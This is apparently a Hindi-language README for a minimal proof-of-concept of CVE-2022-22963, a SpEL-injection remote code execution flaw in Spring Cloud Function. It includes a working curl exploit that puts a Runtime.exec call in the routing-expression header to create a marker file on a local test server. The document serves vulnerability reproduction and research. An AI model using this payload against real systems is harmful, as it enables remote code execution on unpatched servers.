
CVE-2022-22963 के लिए न्यूनतम प्रूफ-ऑफ-कॉन्सेप्ट, Spring Cloud Function में SpEL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन। curl और एक कमजोर सर्वर के साथ शोषण प्रदर्शित करता है।
org.springframework.cloud:spring-cloud-function-core में CVE-2022-22963 रिमोट कोड एक्ज़ीक्यूशन को दोहराने के लिए न्यूनतम उदाहरण।
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
एक्सप्लॉइट के परिणामस्वरूप, PWNED फ़ाइल pom.xml के पास बन जाएगी।